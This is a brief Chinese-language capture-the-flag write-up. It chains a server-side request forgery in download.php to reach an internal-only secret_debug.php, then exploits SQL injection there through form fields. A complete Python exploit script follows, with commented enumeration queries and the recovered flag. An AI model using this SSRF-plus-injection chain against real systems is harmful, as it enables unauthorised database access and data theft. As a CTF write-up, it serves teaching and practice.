進去掃目錄發現/secret
無法直接進入secret_debug.php 顯示ip不對
點paper會向download.php傳參,可以下載一個ssrf內容的pdf,
於是想到利用ssrf來訪問secret_debug.php
發現參數s,fuzz一下,發現s=3時會有如下返回
經測試在此頁面發現sql注入漏洞,進行注入得到flag,腳本如下:
import requests
import random
import urllib
url = 'http://111.198.29.45:52536/download.php'
# subquery = "database()"
# ssrfw
# subquery = "select table_name from information_schema.tables where table_schema='ssrfw' LIMIT 1"
# cetcYssrf
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1"
# secretname -> flag
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1, 1"
# value -> flag{cpg9ssnu_OOOOe333eetc_2018}
subquery = "select value from cetcYssrf LIMIT 1"
id = random.randint(1, 10000000)
d = ('http://127.0.0.1/secret/secret_debug.php?' +
urllib.parse.urlencode({
"s": "3",
"txtfirst_name": "L','1',("+subquery+"),'1'/*",
"txtmiddle_name": "m",
"txtLast_name": "y",
"txtname_suffix": "Esq.",
"txtdob": "*/,'01/10/2019",
"txtdl_nmbr": id,
"txtRetypeDL": id
}) + "&")
r = requests.get(url, params={"dl": d})
print(r.text)